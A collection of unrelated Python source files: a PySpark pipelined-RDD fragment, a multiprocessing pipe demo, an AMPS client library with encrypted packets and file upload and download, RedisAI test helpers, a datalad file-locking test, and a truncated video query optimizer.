else:
return self.getNumPartitions()
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
command = (self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_command = CloudPickleSerializer().dumps(command)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
self.ctx._gateway._gateway_client)
self.ctx._pickled_broadcast_vars.clear()
class_tag = self._prev_jrdd.classTag()
env = MapConverter().convert(self.ctx.environment,
self.ctx._gateway._gateway_client)
includes = ListConverter().convert(self.ctx._python_includes,
self.ctx._gateway._gateway_client)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_command),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
broadcast_vars, self.ctx._javaAccumulator,
class_tag)
self._jrdd_val = python_rdd.asJavaRDD()
return self._jrdd_val
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
pipe_20_3_2.py
|
#!/usr/bin/env python3
# -*- coding:UTF-8
""" 使用管道进行进程间通信
读端-写端,类似与socket端口
每个端口即可以读入又可以写入
"""
import multiprocessing
def consumer(pipe):
read_p, write_p = pipe
write_p.close() # 关闭管道的写端
while True:
try:
item = read_p.recv()
except EOFError:
break
print(item)
print('Consumer done')
def producer(seq,write_p):
for item in seq:
write_p.send(item)
if __name__ == '__main__':
(read_p, write_p) = multiprocessing.Pipe()
#消费者
cons_p = multiprocessing.Process(target=consumer, args=((read_p, write_p),))
cons_p.start()
#关闭父进程的读端
read_p.close()
seq = range(100)
producer(seq, write_p)
# 生产完成,关闭生产者的写端
# 否则,会在消费者的recv处阻塞挂起,important
write_p.close()
#等待消费者结束
cons_p.join()
print('Main process over')
|
ACELib.py
|
"""
ACELib (AMPS Client Environment Library)
A library to allow any process to supply data to an official AMPS Server
"""
import socket
import json
import base64
import hashlib
import threading
import keyExchange
import encryption
import packet as Packet
import dataOverString as DataString
import ACEExceptions as ACEE
class Connection:
"""
Connection class wraps the connection to an AMPS Server
"""
def __init__(self, host="127.0.0.1", port=4242):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.host = host
self.port = port
self.key = 0
self.callBacks = {}
def connect(self):
"""
Connects to the AMPS Server, and initalizes the connection
"""
self.socket.connect((self.host, self.port))
def recievePacketVerify(self, encrypted=False):
"""
Gets a packet from the server, and verifies it is of the correct
format
"""
if not encrypted:
rawPacketData = Packet.readPacket(self.socket)
if not rawPacketData.endswith("-ENDACROFTPPACKET-/"):
raise ACEE.BadPacketException("Corrupted Packet")
rawPacketData = rawPacketData[:-19]
else:
encryptedPacket = Packet.readPacket(self.socket)
if not encryptedPacket.endswith("-ENDACROFTPPACKET-/"):
raise ACEE.BadPacketException("Corrupted Packet")
encryptedPacket = encryptedPacket[:-19]
jsonPart = json.loads(encryptedPacket)["payload"]
rawPacketData = encryption.decrypt(jsonPart, self.key)
rawPacketData = "".join(rawPacketData)
packetDataJSON = json.loads(rawPacketData)
return packetDataJSON
def recievePacketType(self, packetType,
exception=ACEE.BadPacketTypeException(),
encrypted=False):
"""
Gets a packet from the server, and checks that it is of the
correct type
"""
packet = self.recievePacketVerify(encrypted)
if packet['packetType'] == packetType:
return packet
raise exception
def handshake(self):
"""
Performs the standard handshake with an AMPS Server
"""
packet = self.recievePacketVerify()
if packet['packetType'] == '__HDS__' and packet['payload'] == '31415':
Packet.Packet('31415', "__HDS__").send(self.socket)
else:
raise ACEE.BadHandshakeException("Handshake not formated well")
def getKey(self):
"""
Performs the other half of the key exchange, resulting in the
sharing of keys between the AMPS Server and client
"""
primeError = (ACEE.
BadPacketTypeException("Prime Packet has Bad Type"))
mixedError = (ACEE.BadPacketTypeException("Mixed Secret has Bad Type"))
primePacket1 = self.recievePacketType('__DAT__', primeError)
primePacket2 = self.recievePacketType('__DAT__', primeError)
primePacketData1 = primePacket1['payload'][2:]
primePacketData2 = primePacket2['payload'][2:]
primes = [DataString.convertDataToInt(primePacketData1),
DataString.convertDataToInt(primePacketData2)]
exchange = keyExchange.KeyExchange(primes)
exchange.randomSecret()
mixed = exchange.calculateMixed()
otherMixedPacket = self.recievePacketType('__DAT__', mixedError)
otherMixed = (DataString.
convertDataToInt(otherMixedPacket['payload'][2:]))
key = exchange.getSharedKey(otherMixed)
mixedPacket = Packet.Packet("00" + DataString.convertIntToData(mixed))
mixedPacket.send(self.socket)
return key
def initConnection(self):
"""
Does the initalization of the connection with the server
Does the connection, handshake, and the keyexchange
"""
self.connect()
self.handshake()
self.key = self.getKey()
def sendEncrypted(self, packetBody, packetType):
"""
Sends encrypted data over the connection
"""
Packet.Packet(encryption.encrypt(packetBody, self.key),
packetType).send(self.socket)
def sendEncryptedDict(self, dictionary, dataType):
"""
Converts a dictionary to a JSON object, and sends that over an
encrypted connection
"""
jsonObject = json.dumps(dictionary)
self.sendEncrypted(jsonObject, dataType)
def setData(self, name, value, dataType="str"):
"""
Sets data in the cache on the server
Specificly, sets the data under name to value
"""
self.sendEncryptedDict({"CMDType": "setData",
"name": name,
"value": value,
"dataType": dataType}, "__CMD__")
def getData(self, name):
"""
Gets data by name from the server
"""
self.sendEncryptedDict({"CMDType": "getData",
"name": name}, "__CMD__")
data = self.recievePacketType("__DAT__", encrypted=True)
return data["payload"]
def loginServer(self, username, password):
"""
Starts the login process with the AMPS server
"""
password = hashlib.sha3_256(password.encode()).hexdigest()
self.sendEncryptedDict({"CMDType": "login",
"data": {"username": username,
"password": password}},
"__CMD__")
result = self.recievePacketVerify(encrypted=True)
return result["data"]
def downloadFile(self, fileName, fileObject):
"""
Downloads the file with the given filename on the server,
and outputs it to the (binary, must be binary) file stored in
fileObject
"""
self.sendEncryptedDict({"CMDType": "downloadFile",
"data":{"filePath": fileName,
"windowID": -42,
"filePathModifier":""}}, "__CMD__",)
encryptedData = "".join(Packet.getPacket(self.socket)['payload'])
data = json.loads("".join(encryption.decrypt(encryptedData, self.key)))["payload"]["file"]
fileObject.write(base64.b64decode(data))
def runLibraryFunction(self, libraryName, functionName, arguments):
self.sendEncryptedDict({"CMDType": "libraryFunction",
"data":{"library": libraryName,
"function": functionName,
"arguments":arguments}}, "__CMD__",)
def uploadFile(self, fileObject, fileName):
"""
Uploads the data from the fileObject and stores it in the file
designated by fileName
"""
self.sendEncryptedDict({"CMDType": "uploadFile",
"data":{"filePath": fileName,
"index": 0,
"file":base64.b64encode(
fileObject.read()
).decode("ascii")}}, "__CMD__")
def addListener(self, key, callBack):
"""
Adds an event listener on the server to respond to the variable in
key being updated, upon it being updated callBack will be called, with
two parameters, the first being the new value, and the second, the old
value.
"""
self.callBacks[key] = callBack
self.sendEncryptedDict({"CMDType": "subscribeToEvent",
"data":{"dataTitle": key}}, "__CMD__")
def _listener(self):
generator = Packet.fullGenerator(self.socket)
while True:
packet = json.loads("".join(encryption.
decrypt(next(generator)['payload'],
self.key)))
self.callBacks[packet["payload"]["key"]](
packet["payload"]["newValue"],
packet["payload"]["oldValue"])
def startListener(self):
"""
Starts the event loop, while this occurs in a seperate thread and code
can be run after this is called, it is still recomended to call this
at the end of a file.
"""
threading.Thread(target=self._listener, args=()).start()
|
includes.py
|
import json
import os
import random
import sys
import time
from multiprocessing import Process
import threading
import redis
from numpy.random import default_rng
import numpy as np
from skimage.io import imread
from skimage.transform import resize
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../opt/readies"))
import paella
ROOT = os.environ.get("ROOT", None)
TESTMOD_PATH = os.environ.get("TESTMOD", None)
MAX_ITERATIONS = 2 if os.environ.get("MAX_ITERATIONS") == None else os.environ.get("MAX_ITERATIONS")
TEST_TF = os.environ.get("TEST_TF") != "0" and os.environ.get("WITH_TF") != "0"
TEST_TFLITE = os.environ.get("TEST_TFLITE") != "0" and os.environ.get("WITH_TFLITE") != "0"
TEST_PT = os.environ.get("TEST_PT") != "0" and os.environ.get("WITH_PT") != "0"
TEST_ONNX = os.environ.get("TEST_ONNX") != "0" and os.environ.get("WITH_ORT") != "0"
COV = os.environ.get("COV") != "0" and os.environ.get("COV") != "0"
DEVICE = os.environ.get('DEVICE', 'CPU').upper().encode('utf-8', 'ignore').decode('utf-8')
VALGRIND = os.environ.get("VALGRIND") == "1"
print("Running tests on {}\n".format(DEVICE))
print("Using a max of {} iterations per test\n".format(MAX_ITERATIONS))
# change this to make inference tests longer
MAX_TRANSACTIONS=100
# returns the test name and line number from which a helper function within this file was called.
# For example, if an assertion fails in check_error_message function, and the caller function to check_error_message
# is in tests_onnx.py line 25, this should return: "tests_onnx:py:25"
def get_caller_pos():
return f'{sys._getframe(2).f_code.co_filename.split("/")[-1]}:{sys._getframe(2).f_lineno}'
def ensureSlaveSynced(con, env, timeout_ms=0):
if env.useSlaves:
# When WAIT returns, all the previous write commands
# sent in the context of the current connection are
# guaranteed to be received by the number of replicas returned by WAIT.
wait_reply = con.execute_command('WAIT', '1', timeout_ms)
try:
number_replicas = int(wait_reply)
except Exception as ex:
# Error in converting to int
env.debugPring(str(ex), force=True)
env.assertFalse(True, message=get_caller_pos())
return
env.assertEqual(number_replicas, 1)
# Ensures command is sent and forced disconnect
# after without waiting for the reply to be parsed
# Usefull for checking behaviour of commands
# that are run with background threads
def send_and_disconnect(cmd, red):
pool = red.connection_pool
con = pool.get_connection(cmd[0])
ret = con.send_command(*cmd)
con.disconnect()
# For making sure that Redis will have the time to exit cleanly.
time.sleep(1)
return ret
def check_cuda():
return os.system('which nvcc')
def info_to_dict(info):
info = [el.decode('utf-8') if type(el) is bytes else el for el in info]
return dict(zip(info[::2], info[1::2]))
def load_resnet_test_data():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data/imagenet')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'dog.jpg')
model_filename = os.path.join(test_data_path, 'resnet50.pb')
script_filename = os.path.join(test_data_path, 'data_processing_script.txt')
with open(script_filename, 'rb') as f:
script = f.read()
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.uint8)
return model_pb, script, labels, img
def load_resnet_test_data_old():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data/imagenet')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'dog.jpg')
model_filename = os.path.join(test_data_path, 'resnet50.pb')
script_filename = os.path.join(test_data_path, 'data_processing_script_old.txt')
with open(script_filename, 'rb') as f:
script = f.read()
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.uint8)
return model_pb, script, labels, img
def load_mobilenet_v1_test_data():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'panda.jpg')
model_filename = os.path.join(test_data_path, 'mobilenet/mobilenet_v1_100_224_cpu_NxHxWxC.pb')
input_var = 'input'
output_var = 'MobilenetV1/Predictions/Reshape_1'
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.float32)
return model_pb, input_var, output_var, labels, img
def load_mobilenet_v2_test_data():
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
labels_filename = os.path.join(test_data_path, 'imagenet_class_index.json')
image_filename = os.path.join(test_data_path, 'panda.jpg')
model_filename = os.path.join(test_data_path, 'mobilenet/mobilenet_v2_1.4_224_frozen.pb')
input_var = 'input'
output_var = 'MobilenetV2/Predictions/Reshape_1'
with open(model_filename, 'rb') as f:
model_pb = f.read()
with open(labels_filename, 'r') as f:
labels = json.load(f)
img_height, img_width = 224, 224
img = imread(image_filename)
img = resize(img, (img_height, img_width), mode='constant', anti_aliasing=True)
img = img.astype(np.float32)
return model_pb, input_var, output_var, labels, img
def load_creditcardfraud_data(env,max_tensors=10000):
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
model_filename = os.path.join(test_data_path, 'creditcardfraud.pb')
creditcard_transaction_filename = os.path.join(test_data_path, 'creditcard_10K.csv')
rg = default_rng()
creditcard_transactions = np.genfromtxt(creditcard_transaction_filename, delimiter=',', dtype='float32', skip_header=1, usecols=range(0,30))
creditcard_referencedata = []
for tr in range(0,max_tensors):
creditcard_referencedata.append(rg.random((1,256), dtype='float32'))
with open(model_filename, 'rb') as f:
model_pb = f.read()
return model_pb, creditcard_transactions, creditcard_referencedata
def run_mobilenet(con, img, input_var, output_var):
time.sleep(0.5 * random.randint(0, 10))
con.execute_command('AI.TENSORSET', 'input{1}',
'FLOAT', 1, img.shape[1], img.shape[0], img.shape[2],
'BLOB', img.tobytes())
con.execute_command('AI.MODELEXECUTE', 'mobilenet{1}',
'INPUTS', 1, 'input{1}', 'OUTPUTS', 1, 'output{1}')
def run_test_multiproc(env, routing_hint, n_procs, fn, args=tuple()):
procs = []
def tmpfn():
con = env.getConnectionByKey(routing_hint, None)
fn(con, *args)
return 1
for _ in range(n_procs):
p = Process(target=tmpfn)
p.start()
procs.append(p)
[p.join() for p in procs]
# Load a model/script from a file located in test_data dir.
def load_file_content(file_name):
test_data_path = os.path.join(os.path.dirname(__file__), 'test_data')
filename = os.path.join(test_data_path, file_name)
with open(filename, 'rb') as f:
return f.read()
def check_error_message(env, con, error_msg, *command, error_msg_is_substr=False):
try:
con.execute_command(*command)
env.assertFalse(True, message=get_caller_pos())
except Exception as exception:
env.assertEqual(type(exception), redis.exceptions.ResponseError, message=get_caller_pos())
if error_msg_is_substr:
# We only verify that the given error_msg is a substring of the entire error message.
env.assertTrue(str(exception).find(error_msg) >= 0, message=get_caller_pos())
else:
env.assertEqual(error_msg, str(exception), message=get_caller_pos())
def check_error(env, con, *command):
try:
con.execute_command(*command)
env.assertFalse(True, message=get_caller_pos())
except Exception as e:
exception = e
env.assertEqual(type(exception), redis.exceptions.ResponseError, message=get_caller_pos())
# Returns a dict with all the fields of a certain section from INFO MODULES command
def get_info_section(con, section):
sections = ['ai_versions', 'ai_git', 'ai_load_time_configs', 'ai_backends_info', 'ai_cpu']
section_ind = [i for i in range(len(sections)) if sections[i] == 'ai_'+section][0]
return {k.split(":")[0]: k.split(":")[1]
for k in con.execute_command("INFO MODULES").decode().split("#")[section_ind+2].split()[1:]}
def get_connection(env, routing_hint):
return env.getConnectionByKey(routing_hint, None)
|
test_locking.py
|
#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 noet:
"""
LICENSE: MIT
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os.path as op
from ..locking import lock_if_check_fails
from datalad.tests.utils import (
ok_exists,
with_tempfile,
ok_,
eq_,
known_failure_windows,
)
class Subproc:
# By implementing this closure as a class instead of as a nested function,
# it becomes possible to pickle it.
def __init__(self, tempfile):
self.tempfile = tempfile
def __call__(self, q):
with lock_if_check_fails(False, self.tempfile, blocking=False, _return_acquired=True)\
as (_, lock2, acquired):
# we used to check for .acquired here but it was removed from
# fasteners API: https://github.com/harlowja/fasteners/issues/71
q.put(acquired)
@known_failure_windows
@with_tempfile
def test_lock_if_check_fails(tempfile):
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(True, None) as (check, lock):
assert check is True
assert lock is None
assert check # still available outside
# and with a callable
with lock_if_check_fails(lambda: "valuable", None) as (check, lock):
eq_(check, "valuable")
assert lock is None
eq_(check, "valuable")
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile) as (check, lock):
ok_(lock)
ok_exists(tempfile + '.lck')
assert not op.exists(tempfile + '.lck') # and it gets removed after
# the same with providing operation
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):
ok_(lock)
ok_exists(tempfile + '.get-lck')
assert not op.exists(tempfile + '.get-lck') # and it gets removed after
from multiprocessing import Queue, Process
q = Queue()
p = Process(target=Subproc(tempfile), args=(q,))
# now we need somehow to actually check the bloody lock functioning
with lock_if_check_fails((op.exists, (tempfile,)), tempfile, _return_acquired=True) as (check, lock, acquired):
eq_(check, False)
ok_(lock)
ok_(acquired)
# but now we will try to lock again, but we need to do it in another
# process
p.start()
assert q.get() is False
p.join()
with open(tempfile, 'w') as f:
pass
ok_exists(tempfile)
ok_exists(tempfile)
# and we redo -- it will acquire it
p = Process(target=Subproc(tempfile), args=(q,))
p.start()
ok_(q.get())
p.join()
|
query_optimizer.py
|
"""
This file composes the functions that are needed to perform query optimization.
Currently, given a query, it does logical changes to forms that are
sufficient conditions.
Using statistics from Filters module, it outputs the optimal plan (converted
query with models needed to be used).
To see the query optimizer performance in action, simply run
python query_optimizer/query_optimizer.py
@Jaeho Bang
"""
import os
import socket
# The query optimizer decide how to label the data points
# Load the series of queries from a txt file?
import sys
import threading
from itertools import product
import numpy as np
from src import constants
eva_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(eva_dir)
class Query:
def __init__(self, obj, score, model, red_rate):
self.obj = obj
self.score = score
self.model = model
self.red_rate = red_rate
def __lt__(self, other):
return self.score < other.score
class QueryOptimizer:
"""
TODO: If you have a classifier for =, you can make a classifier for !=
TODO: Deal with parenthesis
"""
def __init__(self, ip_str="127.0.0.1"):
self.ip_str = ip_str
# self.startSocket()
self.operators = ["!=", ">=", "<=", "=", "<", ">"]
self.separators = ["||", "&&"]
def startSocket(self):
thread = threading.Thread(target=self.inputQueriesFromSocket)
thread.daemon = True
thread.start()
while True:
input = eval(input(
'Type in your query in the form of __label__ > __number__\n'))
self.parseInput(input)
def parseInput(self, input):
"""
TODO: Need to provide query formats that can be used
:param input: string to be parsed
:return: something that the Load() class can understand
"""
pass
def inputQueriesFromTxt(self, input_path):
"""
TODO: Read the file line by line, use self.parseInput to give back
commands
:param input_path: full directory + file name
:return: method of training the pps
"""
pass
def inputQueriesFromSocket(self):
sock = socket.socket()
sock.bind(self.ip_str, 123)
sock.listen(3)
print("Waiting on connection")
conn = sock.accept()
print("Client connected")
while True:
m = conn[0].recv(4096)
conn[0].send(m[::-1])
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def _findParenthesis(self, query):
start = []
end = []
query_copy = query
index = query_copy.find("(")
while index != -1:
start.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find("(")
query_copy = query
index = query_copy.find(")")
while index != -1:
end.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find(")")
return [start, end]
def _parseQuery(self, query):
"""
Each sub query will be a list
There will be a separator in between
:param query:
:return:
"""
query_parsed = []
query_subs = query.split(" ")
query_operators = []
for query_sub in query_subs:
if query_sub == "||" or query_sub == "&&":
query_operators.append(query_sub)
else:
if True not in [operator in self.operators for operator in
query_sub]:
return [], []
for operator in self.operators:
query_sub_list = query_sub.split(operator)
if type(query_sub_list) is list and len(
query_sub_list) > 1:
query_parsed.append(
[query_sub_list[0], operator, query_sub_list[1]])
break
# query_parsed ex: [ ["t", "=", "van"], ["s", ">", "60"]]
# query_operators ex: ["||", "||", "&&"]
return query_parsed, query_operators
def _logic_reverse(self, str):
if str == "=":
return "!="
elif str == "!=":
return "="
elif str == ">":
return "<="
elif str == ">=":
return "<"
elif str == "<":
return ">="
elif str == "<=":
return ">"
def convertL2S(self, parsed_query, query_ops):
final_str = ""
index = 0
for sub_parsed_query in parsed_query:
if len(parsed_query) >= 2 and index < len(query_ops):
final_str += ''.join(sub_parsed_query) + " " + query_ops[
index] + " "
index += 1
else:
final_str += ''.join(sub_parsed_query)
return final_str
def _wrangler(self, query, label_desc):
"""
import itertools
iterables = [ [1,2,3,4], [88,99], ['a','b'] ]
for t in itertools.product(*iterables):
print t
Different types of checks are performed
1. not equals check (f(C) != v)
2. comparison check (f(C) > v -> f(C) > t, for all t <= v)
3. Range check (v1 <= f(C) <= v2) - special type of comparison check
4. No-predicates = when column in finite and discrete, it can still
benefit
ex) 1 <=> type = car U type = truck U type = SUV
:return: transformed query
"""
# TODO: Need to implement range check
query_parsed, query_operators = self._parseQuery(query)
# query_sorted = sorted(query_parsed)
query_transformed = []
equivalences = []
equivalences_op = []
for query_sub_list in query_parsed:
subject = query_sub_list[0]
operator = query_sub_list[1]
object = query_sub_list[2]
assert (
subject in label_desc) # Label should be in label
# description dictionary
l_desc = label_desc[subject]
if l_desc[0] == constants.DISCRETE:
equivalence = [self.convertL2S([query_sub_list], [])]
assert (operator == "=" or operator == "!=")
alternate_string = ""
for category in l_desc[1]:
if category != object:
alternate_string += subject + self._logic_reverse(
operator) + category + " && "
alternate_string = alternate_string[
:-len(" && ")] # must strip the last ' || '
# query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
elif l_desc[0] == constants.CONTINUOUS:
equivalence = [self.convertL2S([query_sub_list], [])]
assert (operator == "=" or operator == "!=" or operator == "<"
or operator == "<=" or operator == ">" or operator ==
">=")
alternate_string = ""
if operator == "!=":
alternate_string += subject + ">" + object + " && " + \
subject + "<" + object
query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(query_tmp)
if operator == "<" or operator == "<=":
object_num = eval(object)
for number in l_desc[1]:
if number > object_num:
alternate_string = subject + operator + str(number)
# query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
if operator == ">" or operator == ">=":
object_num = eval(object)
for number in l_desc[1]:
if number < object_num:
alternate_string = subject + operator + str(number)
# query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
equivalences.append(equivalence)
possible_queries = product(*equivalences)
for q in possible_queries:
query_transformed.append(q)
return query_transformed, query_operators
def _compute_expression(self, query_info, pp_list, pp_stats, k,
accuracy_budget):
"""
def QueryOptimizer(P, {trained PPs}):
P = wrangler(P)
{E} = compute_expressions(P,{trained PP},k) #k is a fixed
constant which limits number of individual PPs
in the final expression
for E in {E}:
Explore_PP_accuracy_budget(E) # Paper says dynamic program
Explore_PP_Orderings(E) #if k is small, any number of orders
can be explored
Compute_cost_vs_red_rate(E) #arithmetic over individual c,
a and r[a] numbers
return E_with_max_c/r
1. p^(P/p) -> PPp
2. PPp^q -> PPp ^ PPq
3. PPpvq -> PPp v PPq
4. p^(P/p) -> ~PP~q
-> we don't need to apply these rules, we simply need to see for each
sub query which PP gives us the best rate
:param query_info: [possible query forms for a given query, operators
that go in between]
:param pp_list: list of pp names that are currently available
:param pp_stats: list of pp models associated with each pp name with
R,C,A values saved
:param k: number of pps we can use at maximum
:return: the list of pps to use that maximizes reduction rate (ATM)
"""
evaluations = []
evaluation_models = []
evaluations_stats = []
query_transformed, query_operators = query_info
# query_transformed = [[["t", "!=", "car"], ["t", "=", "van"]], ... ]
for possible_query in query_transformed:
evaluation = []
evaluation_stats = []
k_count = 0
op_index = 0
for query_sub in possible_query: # Even inside query_sub it can
# be divided into query_sub_sub
if k_count > k: # TODO: If you exceed a certain number,
# you just ignore the expression
evaluation = []
evaluation_stats = []
continue
query_sub_list, query_sub_operators = self._parseQuery(
query_sub)
evaluation_tmp = []
evaluation_models_tmp = []
evaluation_stats_tmp = []
for i in range(len(query_sub_list)):
query_sub_str = ''.join(query_sub_list[i])
if query_sub_str in pp_list:
# Find the best model for the pp
data = self._find_model(query_sub_str, pp_stats,
accuracy_budget)
if data is None:
continue
else:
model, reduction_rate = data
evaluation_tmp.append(query_sub_str)
evaluation_models_tmp.append(
model) # TODO: We need to make sure this is
# the model_name
evaluation_stats_tmp.append(reduction_rate)
k_count += 1
reduc_rate = 0
if len(evaluation_stats_tmp) != 0:
reduc_rate = self._update_stats(evaluation_stats_tmp,
query_sub_operators)
evaluation.append(query_sub)
evaluation_models.append(evaluation_models_tmp)
evaluation_stats.append(reduc_rate)
op_index += 1
evaluations.append(Query(self.convertL2S(evaluation, query_operators), self._update_stats(evaluation_stats, query_operators), evaluation_models_tmp, reduc_rate))
# evaluations_stats.append(
# self._update_stats(evaluation_stats, query_operators))
evaluations.sort()
# max_index = np.argmax(np.array(evaluations_stats), axis=0)
max_index = 0
best_query = evaluations[
max_index].obj # this will be something like "t!=bus && t!=truck &&
# t!=car"
best_models = evaluations[max_index].model
best_reduction_rate = evaluations[max_index].red_rate
pp_names, op_names = self._convertQuery2PPOps(best_query)
return [list(zip(pp_names, best_models)), op_names,
best_reduction_rate]
def _convertQuery2PPOps(self, query):
"""
:param query: str (t!=car && t!=truck)
:return:
"""
query_split = query.split(" ")
pp_names = []
op_names = []
for i in range(len(query_split)):
if i % 2 == 0:
pp_names.append(query_split[i])
else:
if query_split[i] == "&&":
op_names.append(np.logical_and)
else:
op_names.append(np.logical_or)
return pp_names, op_names
# Make this function take in the list of reduction rates and the operator
# lists
def _update_stats(self, evaluation_stats, query_operators):
if len(evaluation_stats) == 0:
return 0
final_red = evaluation_stats[0]
# assert (len(evaluation_stats) == len(query_operators) + 1)
for i in range(1, len(evaluation_stats)):
if query_operators[i - 1] == "&&":
final_red = final_red + evaluation_stats[i] - final_red * \
evaluation_stats[i]
elif query_operators[i - 1] == "||":
final_red = final_red * evaluation_stats[i]
return final_red
def _compute_cost_red_rate(self, C, R):
assert (
R >= 0 and R <= 1) # R is reduction rate and should be
# between 0 and 1
if R == 0:
R = 0.000001
return float(C) / R
def _find_model(self, pp_name, pp_stats, accuracy_budget):
possible_models = pp_stats[pp_name]
best = [] # [best_model_name, best_model_cost /
# best_model_reduction_rate]
for possible_model in possible_models:
if possible_models[possible_model]["A"] < accuracy_budget:
continue
if best == []:
best = [possible_model, self._compute_cost_red_rate(
possible_models[possible_model]["C"],
possible_models[possible_model]["R"]),
possible_models[possible_model]["R"]]
else:
alternative_best_cost = self._compute_cost_red_rate(
possible_models[possible_model]["C"],
possible_models[possible_model]["R"])
if alternative_best_cost < best[1]:
best = [possible_model, alternative_best_cost,
possible_models[possible_model]["R"]]
if best == []:
return None
else:
return best[0], best[2]
def run(self, query, pp_list, pp_stats, label_desc, k=3,
accuracy_budget=0.9):
"""
:param query: query of interest ex) TRAF-20
:param pp_list: list of pp_descriptions - queries that are available
:param pp_stats: this will be dictionary where keys are "pca/ddn",
it will have statistics saved which are R (
reduction_rate), C (cost_to_train), A (accuracy)
:param k: number of different PPs that are in any expression E
:return: selected PPs to use for reduction
"""
query_transformed, query_operators = self._wrangler(query, label_desc)
# query_transformed is a comprehensive list of transformed queries
return self._compute_expression([query_transformed, query_operators],
pp_list, pp_stats, k, accuracy_budget)
if __name__ == "__main__":
query_list = ["t=suv", "s>60",
"c=white", "c!=white", "o=pt211", "c=white && t=suv",
"s>60 && s<65", "t=sedan || t=truck", "i=pt335 && o=pt211",
"t=suv && c!=white", "c=white && t!=suv && t!=van",
